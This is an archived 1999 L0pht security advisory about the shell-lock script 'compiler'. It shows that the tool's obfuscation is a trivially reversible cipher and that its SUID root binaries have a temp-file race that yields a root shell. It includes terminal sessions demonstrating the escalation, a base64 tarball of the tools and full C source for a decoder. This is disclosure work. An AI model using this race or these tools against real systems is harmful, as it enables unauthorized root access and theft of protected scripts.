TUCoPS :: Unix :: General :: slock-1.htm

Vulnerability
 shell-lock
Affected
 Those running shell-lock (available for all UNIX platforms)
Description
 Following is based on L0pht Security Advisory. (a) A trivial
 encoding mechanism is used for obfuscating the shell code in the
 "compiled" binary. Anyone with read permissions to the file in
 question can decode and retrieve the original shell code. Another
 vulnerability exists where the user can retrieve the un-encoded
 shell script without needing to actually decode the binary.
 (b) The vendors claim the program to be useful in creating SUID
 binaries on systems that do not honor SUID shell scripts and also
 to protect against the security problems with SUID shell scripts.
 As it turns out any shell-lock "compiled" program that is SUID
 root will allow any user to execute any program with root
 privileges.
 Example (a'):
 [slaughter-house] cat q.sh
 #!/bin/sh
 echo "hi there... this is a test"
 [slaughter-house] shell-lock -o q q.sh
 SHELL-LOCK(tm)
 Shell Script Security Software
 Copyright (C) 1989-1999
 Cactus International, Inc.
 (Version: 2.1.1.1 7/19/99)
 Converting files: q.sh
 Compiling.....DEMO Version...
 Success!!
 The shell script "q" has been compiled and placed in "q"
 Conversion successful!!
 [slaughter-house] file q
 q: ELF 32-bit MSB executable SPARC Version 1, dynamically linked, stripped
 [slaughter-house] ./q
 hi there... this is a test
 [slaughter-house] strings ./q
 (some stuff... not the ascii from the shell script)
 [slaughter-house] ./codem -d -i ./q
 #!/bin/sh
 rm -f 0ドル 2>/dev/null
 echo "hi there... this is a test"
 Example (a''):
 [slaughter-house] temp-watch -d /var/tmp -C 'q*' -D ./ &
 [1] 22971
 [slaughter-house] nice +10 ./q
 hi there... this is a test
 [slaughter-house] more q*
 #!/bin/sh
 rm -f 0ドル 2>/dev/null
 echo "hi there... this is a test"
 Example (b):
 # ls -l q
 -rwxr-xr-x 1 mudge other 50753 Sep 28 14:24 q
 # chown root q
 # chmod 4755 q
 # exit
 [slaughter-house] id
 uid=789(mudge) gid=1(other)
 [slaughter-house] ls -l q
 -rwsr-xr-x 1 root other 50753 Sep 28 14:24 q
 [slaughter-house] temp-watch -X '^q*' -R /bin/sh -d /var/tmp &
 [1] 23071
 [slaughter-house] nice +10 ./q
 # id
 uid=0(root) gid=1(other)
 So, what's shell-lock? Have you ever seen the big advertisements
 run in the back of SysAdmin magazine. You know, the ones with the
 Texan with the huge hat and sunglasses? Well, that is Cactus
 software. The program "shell-lock" is used to create ELF binaries
 from shell scripts. Ostensibly called a Shell Script Compiler,
 the literature states that the program also hides the original
 shell code so as not to be returnable through running strings(1)
 on the binary.
 A quick decompilation shows that the encoding and decoding
 routines look as follows:
 0x16194 : inc %i4 Increment the counter
 0x16198 : srl %i4, 0x1f, %o0 {
 0x1619c : add %i4, %o0, %o0 { testing for odd v even
 0x161a0 : andn %o0, 1, %o0 {
 0x161a4 : cmp %i4, %o0 {
 0x161a8 : bne 0x161b8 If they match
 0x161ac : add %o1, 0x63, %o2 add 0x63 to the value
 0x161b0 : b 0x161c0 else
 0x161b4 : ld [ %i1 ], %o0
 0x161b8 : add %o1, 0x44, %o2 add 0x44 to the value
 0x161bc : ld [ %i1 ], %o0
 0x161c0 : deccc %o0
 0x161c4 : bneg 0x16228
 0x161c8 : st %o0, [ %i1 ]
 0x161cc : ld [ %i1 + 4 ], %o0
 0x161d0 : add %o0, 1, %o1
 0x161d4 : st %o1, [ %i1 + 4 ]
 0x161d8 : and %o2, 0xff, %o1 and with 0xff (hey it's
 0x161dc : stb %o1, [ %o0 ] ascii printable after all)
 0x161e0 : ld [ %i0 ], %o0
 0x161e4 : deccc %o0
 This basically boils down to the following C code snippit.
 for (i=0; i < strlen ; i++){
 if (!(i % 2))
 outbuff[i] = (inbuff[i] + 0x44) & 0xff;
 else
 outbuff[i] = (inbuff[i] + 0x63) & 0xff;
 }
 Conversely the decoding subtracts 0x44 and 0x63 alternately. What
 shell-lock does when it creates the initial "compiled" binary
 from the shell script is to add the line "rm -f 0ドル 2>/dev/null" to
 the bourne shell script (or "unlink $ZERO ;
 $ZERO=ENV{'X0'};\n.\nw\nq" for a perl script) and encodes the
 entire file. This is then copied into the data section of a
 skeleton binary file. The binary file, upon execution, reads the
 encoded data section and writes it out to a temporary file
 (*note: the default location is /var/tmp though it will follow
 the TMPDIR variable) and then execve's /bin/sh to call the
 program.
 The first method of extracting the data comes in using the
 attached program to read the binary and run the data section
 through the decoding routine.
 The second method of extraction is to use the current version of
 temp-watch (available freely from the L0pht advisories site) to
 make a copy of the temporary file containing the original shell
 code that is created when the binary is run.
 The SUID root vulnerability lies in the fact that while the
 temporary file is created without any special permissions, the
 file exec'ing it is running as root. Thus, as soon as one sees
 the temporary file the race condition exists where the user can
 unlink the file and replace it with a different file or a symlink
 to the program wishing to be executed. This is accomplished in
 the above example with the program temp-watch using arguments
 specifying the replacement of the temporary file with a link to
 /bin/sh. Code follows. temp-watch can be found at
 http://www.l0pht.com/advisories/l0pht-watch.tar.gz
 Below you'll find that mimed and codem after that.
 ---
 Content-Type: application/octet-stream; name="slock.tgz"
 Content-Transfer-Encoding: base64
 Content-Disposition: inline; filename="slock.tgz"
 Content-MD5: t3S/3D5mpdTMzHiMH1lhWA==
 
 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
 0W/5+TLQAH4AAA==
 
 -----
 And now codem:
 #include <stdio.h>
 #include <stdlib.h>
 #include <sys/types.h>
 #include <unistd.h>
 #include <sys/stat.h>
 #include <fcntl.h>
 #include <string.h>
 
 void usage(char *);
 
 int main(int argc, char *argv[]){
 int fdin, fdout;
 int strlen, i, c;
 int cryptFlag=0, decryptFlag=0,seekFlag=0;
 int seekOffset=50688;
 char *infile=NULL, *outfile=NULL;
 char inbuff[8192];
 char outbuff[8192];
 
 
 while ((c = getopt(argc, argv, "cdhi:o:s:")) != EOF){
 switch (c) {
 case 'c':
 cryptFlag++;
 break;
 case 'd':
 decryptFlag++;
 break;
 case 'i':
 infile = optarg;
 break;
 case 'o':
 outfile = optarg;
 break;
 case 's':
 seekOffset = atoi(optarg);
 break;
 case 'h':
 usage(argv[0]);
 break;
 default:
 usage(argv[0]);
 break;
 }
 }
 
 if ((cryptFlag && decryptFlag) || (!cryptFlag && !decryptFlag)){
 printf("Must specify either -c or -d but not both\n");
 usage(argv[0]);
 }
 
 if (infile){
 fdin = open(infile, O_RDONLY);
 if (fdin == -1){
 perror("open infile");
 }
 } else {
 fdin = STDIN_FILENO;
 }
 
 if (outfile){
 fdout = open(outfile, O_WRONLY|O_CREAT|O_EXCL, 0644);
 if (fdout == -1){
 perror("open outfiel");
 }
 } else {
 fdout = STDOUT_FILENO;
 }
 
 memset(inbuff, '0円', sizeof(inbuff));
 memset(outbuff, '0円', sizeof(outbuff));
 
 if (decryptFlag)
 lseek(fdin, seekOffset, SEEK_SET);
 
 while ((strlen = read(fdin, inbuff, sizeof(inbuff))) != 0){
 
 for (i=0; i < strlen ; i++){
 if (cryptFlag){
 if (!(i % 2))
 outbuff[i] = (inbuff[i] + 0x44) & 0xff;
 else
 outbuff[i] = (inbuff[i] + 0x63) & 0xff;
 } else {
 if (!(i % 2))
 outbuff[i] = inbuff[i] - 0x44;
 else
 outbuff[i] = inbuff[i] - 0x63;
 }
 }
 
 write(fdout, outbuff, strlen);
 }
 
 close(fdin);
 close(fdout);
 
 return(0);
 }
 
 void usage(char *progname){
 
 char *c;
 
 c = strrchr(progname, '/');
 if (c)
 c++;
 else
 c = progname;
 
 printf("Usage: %s -cd[h] [-i infile] [-o outfile] [-s seek] \n", c);
 printf(" Shell-lock {en,de}coder by mudge@l0pht.com and _lumpy\n");
 printf(" -c encrypt\n");
 printf(" -d decrypt\n");
 printf(" -h help\n");
 printf(" -i <file> input file\n");
 printf(" -o <file> output file\n");
 printf(" -s <offset> seed offset [defaults to 50688]\n");
 exit(1);
 }
Solution
 Do not take candy or accept car rides from strangers. If
 something seems too good to be true it probably is. There are
 few magic solutions that negate having to do things right in the
 first place.
 If you need a shell script to run with root priveledges consider
 writing it in C or using something like sudo.
 Do not rely upon shell-lock as an obfuscation mechanism for hiding
 the internals of shell scripts in 'compiled' binaries.